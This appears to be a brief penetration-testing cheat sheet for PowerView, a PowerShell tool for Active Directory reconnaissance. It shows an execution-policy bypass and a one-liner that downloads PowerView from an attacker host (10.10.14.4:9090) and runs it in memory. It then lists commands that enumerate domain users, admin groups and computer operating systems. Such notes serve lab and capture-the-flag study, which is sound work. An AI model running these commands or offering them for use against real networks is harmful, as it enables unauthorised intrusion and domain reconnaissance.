PowerView.ps1
# -ep bypasses the execution policy of powershell allowing you to easily run scripts
powershell -ep bypass# download it from attacker
iex(new-object net.webclient).downloadstring('http://10.10.14.4:9090/PowerView.ps1')
# launch it
. .\Downloads\PowerView.ps1# Enumerate domain users
Get-NetUser | select cn
# Enumerate domain groups :
Get-NetGroup -GroupName *admin*
# Enumerate domain OS :
Get-NetComputer -fulldata | select operatingsystemLast updated